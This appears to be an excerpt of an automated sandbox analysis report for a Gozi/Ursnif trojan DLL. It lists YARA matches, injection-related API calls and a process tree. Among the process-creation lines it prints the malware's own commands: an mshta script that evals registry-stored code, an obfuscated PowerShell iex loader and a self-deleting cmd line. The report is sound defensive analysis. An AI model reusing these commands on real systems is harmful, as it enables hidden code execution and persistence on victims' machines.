    Source: 00000018.00000003.638851811.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.265195135.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.264965724.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.265067401.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000018.00000002.881229478.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000018.00000003.638947869.000001F81DE7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.265347278.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.570768221.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.683592364.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000011.00000003.623671400.000002EFC474C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000002.688834794.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.683319477.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.641058618.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.265156974.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.625082208.0000000006568000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.571562648.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.265372293.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: 00000003.00000003.265017955.00000000057D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
    Source: Process Memory Space: rundll32.exe PID: 5108, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
    Source: Process Memory Space: powershell.exe PID: 5872, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: Process Memory Space: control.exe PID: 5160, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D7596
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D826C
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D3EEB
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E49870
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E42990
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E64900
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E688EC
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E53880
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E4B85C
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E621EC
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E5F9DC
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E5C148
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E4F954
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E69120
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E5B12C
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E412DC
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E69254
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E4BA38
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E59BA8
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E66B84
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E6A38C
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E47B90
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E6BB34
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E6630C
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E56B08
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E46310
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E43CE0
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E6ACF4
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E504D0
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E46CB8
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E61C90
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E5FC40
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E44438
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E4DD20
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E48E70
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E61620
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E5CE00
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E437F0
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E4FF68
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E4CF74
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E6BF00
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E59F0C
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E5271C
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D3925 NtMapViewOfSection,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D625A GetProcAddress,NtCreateSection,memset,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D60CC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_050D8491 NtQueryVirtualMemory,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E49870 NtSetContextThread,NtUnmapViewOfSection,NtClose,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E46034 NtAllocateVirtualMemory,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E55010 NtWriteVirtualMemory,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E4C108 NtQueryInformationToken,NtQueryInformationToken,NtClose,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E67AAC NtMapViewOfSection,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E44BE0 NtSetInformationProcess,ResumeThread,FindCloseChangeNotification,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E62300 NtQueryInformationProcess,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E56DA4 NtCreateSection,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E41D94 NtReadVirtualMemory,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E45710 NtQueryInformationProcess,
    Source: C:\Windows\System32\control.exeCode function: 24_2_00E7C029 NtProtectVirtualMemory,NtProtectVirtualMemory,
    Source: 7078612.dllBinary or memory string: OriginalFilenameHh5Ese.dll( vs 7078612.dll
    Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
    Source: 7078612.dllStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: 7078612.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_SECURITY size: 0xa address: 0x0
    Source: 7078612.dllStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\7078612.dll"
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
    Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Qnma='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Qnma).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE9EF.tmp" "c:\Users\user\AppData\Local\Temp\CSC256FD05AD86B46298536785867B2F65B.TMP"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bplkxjdz.cmdline
    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF4AD.tmp" "c:\Users\user\AppData\Local\Temp\CSCCB299674C9DE4DC69C5A44CA79DFE4B3.TMP"
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\7078612.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
    Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
    Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7078612.dll",#1
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name cyynsofy -value gp; new-alias -name wklfdppq -value iex; wklfdppq ([System.Text.Encoding]::ASCII.GetString((cyynsofy "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ogaysol0.cmdline
